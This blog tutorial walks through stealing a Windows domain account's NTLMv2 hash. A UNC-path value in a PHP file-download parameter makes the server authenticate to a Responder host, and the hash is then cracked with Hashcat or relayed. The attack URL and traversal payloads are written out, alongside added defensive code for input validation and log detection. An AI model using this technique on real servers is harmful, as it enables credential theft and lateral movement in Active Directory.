Hello All,
This blog post is a demonstration of "Abuse of File download vulnerability to steal NTLMv2 Hashes".
In this scenario, the web application is hosted on a machine which is part of a Windows Active Directory domain and allows the user to download a file without checking its path.
An attacker can take advantage of the file download vulnerability to trigger a request to an attacker-controlled server which has the "Responder" tool running on it, and steal the NTLMv2 hash from the target server. Responder's "SMB auth server" forces the target server to hand over the NTLMv2 hash; later that NTLMv2 hash can be used to:
1. perform a relay against any Windows machine having "SMB Signing Disabled", or
2. crack it using hash cracking tools like Hashcat.
Let's start with the web application which has the file download vulnerability and can be made to issue an SMB request to download a file from a remote host.
The vulnerable PHP script is
http://192.168.56.200:8080/file.php?file=any_file.txt
and the PHP code is
The PHP script will perform a file download if we specify any file and it exists on the system.
The script accepts a relative as well as a full path, so we will take advantage of this behaviour and make an SMB request to the server which has the Responder tool running on it.
Let's assume the actual request which allows the user to download a file is
http://192.168.56.200:8080/file.php?file=box.html
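The fix on the application side is to stop treating the `file` parameter as a path at all. The handler below is an added example, not the script from the original post: it accepts only a bare file name, rejects anything containing `/`, `\` or a NUL byte (so a UNC path such as `\\host\share\file` never reaches the filesystem layer and the server never opens an SMB connection), and then resolves the result with `realpath()` and checks that it still lies inside one allow-listed directory. The directory name `/var/www/downloads` is an assumption; the parameter name `file` is the one used on the page.

```php
<?php
// Added example (not the post's own script): a download handler that refuses
// UNC, absolute and traversal paths and only serves files inside one directory.
// DOWNLOAD_DIR is an assumed location; point it at the real download folder.
const DOWNLOAD_DIR = '/var/www/downloads';

/**
 * Resolve a user-supplied file name to a path inside $baseDir,
 * or return null if the input must be rejected.
 */
function resolveDownload(string $requested, string $baseDir = DOWNLOAD_DIR): ?string
{
    // 1. Only a bare file name is accepted: no directory separators at all.
    //    This rejects "\\192.168.56.102\box.html" style UNC paths, "../" traversal
    //    and absolute paths before the filesystem is ever touched. basename() on
    //    Linux only knows "/", so backslashes and NUL are checked explicitly.
    if ($requested === '' || $requested !== basename($requested)
        || strpbrk($requested, "/\\\0") !== false) {
        return null;
    }

    // 2. Resolve symlinks and ".." on both sides, then compare the prefix, so a
    //    symlink placed inside the directory cannot point outside it either.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

$path = resolveDownload($_GET['file'] ?? '');
if ($path === null) {
    http_response_code(400);
    exit('invalid file name');
}

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

With this in place, `file=box.html` is served from the allow-listed directory while `file=\\192.168.56.102\box.html` is answered with a 400 before any outbound connection happens. The input check alone is not the whole defence: the post's later point that the web server runs as a domain user is what makes the captured hash valuable, so the service account should be a low-privileged local account, outbound SMB (TCP 445) from web servers should be blocked at the host or network firewall, and SMB signing should be required on domain members so a captured hash cannot be relayed.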
My server where Responder is running has IP 192.168.56.102
Now, make an SMB request to Responder using the vulnerable parameter; it should look like
http://target_web_server/vulnerable_script.php?parameter=\\Responder_server_IP\any_file.txt
Here, target_web_server is 192.168.56.200:8080, vulnerable_script.php is file.php with parameter "file", and Responder_server_IP is 192.168.56.102
The final URL is
http://192.168.56.200:8080/file.php?file=\\192.168.56.102\box.html
If everything goes fine, Responder will capture the NTLMv2 hash of the target server.
The above screenshot shows that Responder captured the hash from the target server, and that the target web server is running with the privileges of a Windows Active Directory user with username "user3".
Now, one can try to crack this captured hash to get the plaintext password. "Hashcat" is an awesome tool to perform the fastest hash cracking. It supports CPU/GPU hash cracking and has support for multiple hash formats. Hashcat's official download website is https://hashcat.net/hashcat/. Download a good password dictionary; here is one: https://hashkiller.co.uk/downloads.aspx. Run hashcat and wait, if luck is on our side.
Hashcat got the plaintext password of the NTLMv2 hash captured by Responder. Now we can play around with the Windows Active Directory a little bit more, as we have the credentials of one Domain User.
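On the detection side, the request that triggers the SMB connection is visible in the web server's access log: the vulnerable parameter carries a value beginning with `\\` (raw, `%5C%5C`-encoded, or double-encoded). The script below is an added example, not from the original post, and is not code the Responder or Hashcat projects ship. It parses Apache/nginx "combined" style log lines, decodes each query parameter, and reports any value that is a UNC path, a `//host` path, a Windows drive path or a `..` traversal. The three log lines are constructed samples built around the URLs shown in the post; the client addresses in them are made up. It assumes PHP 8 for `str_starts_with()`/`str_contains()`.

```php
<?php
// Added example (not from the original post): flag download requests whose
// parameter value would make the server open a remote SMB or file path.

/** True if a (possibly URL-encoded) parameter value points outside the web root. */
function isSuspiciousPathValue(string $value): bool
{
    // Decode twice: the backslash may arrive raw, as %5C, or double-encoded as %255C.
    $decoded = rawurldecode(rawurldecode($value));
    return str_starts_with($decoded, '\\\\')          // \\host\share\file (UNC)
        || str_starts_with($decoded, '//')            // //host/share/file
        || preg_match('/^[A-Za-z]:/', $decoded) === 1 // C:\... absolute path
        || str_contains($decoded, '..');              // ../ traversal
}

/**
 * Parse "combined" style access-log lines and return one record per query
 * parameter whose value looks like a remote or traversal path.
 */
function findUncPathAttempts(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $line) {
        // client IP, ident, user, [timestamp], then "GET /path?query HTTP/1.x"
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $qpos = strpos($m[2], '?');
        if ($qpos === false) {
            continue;
        }
        foreach (explode('&', substr($m[2], $qpos + 1)) as $pair) {
            [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
            if (isSuspiciousPathValue($value)) {
                $hits[] = [
                    'client' => $m[1],
                    'param'  => $name,
                    'value'  => rawurldecode(rawurldecode($value)),
                ];
            }
        }
    }
    return $hits;
}

// Constructed sample log lines (client IPs and timestamps are made up);
// the request URLs mirror the legitimate and the UNC download from the post.
$sampleLog = [
    '192.168.56.1 - - [10/Oct/2018:10:00:01 +0000] "GET /file.php?file=box.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.56.50 - - [10/Oct/2018:10:00:07 +0000] "GET /file.php?file=%5C%5C192.168.56.102%5Cbox.html HTTP/1.1" 200 0 "-" "curl/7.58.0"',
    '192.168.56.50 - - [10/Oct/2018:10:00:09 +0000] "GET /file.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 400 0 "-" "curl/7.58.0"',
];

foreach (findUncPathAttempts($sampleLog) as $hit) {
    printf("ALERT client=%s param=%s value=%s\n", $hit['client'], $hit['param'], $hit['value']);
}
```

Run over the three constructed lines, the first request (`file=box.html`) is silent and the second and third produce an ALERT each. The same two signals are worth correlating with host telemetry: an outbound TCP 445 connection from the web server process, or a Windows logon event for the service account (the post's "user3") originating from a host that is not a domain member, is the server-side footprint of the capture shown in the screenshot.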
That's all from my side.
Thanks for reading.
Special thanks to Sean Metcalf, OJ, Vincent Yiu, Andrew Robbins, will, Benjamin Delpy, Marcello, Andrew van der Stock, g0tmi1k, Alvaro Muñoz, b33f, pancake, m3g9tr0n, Anurag Srivastava, vivek chauhan, Spirited wolf
--==[[ With Love from Team IndiShell ]]==--
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)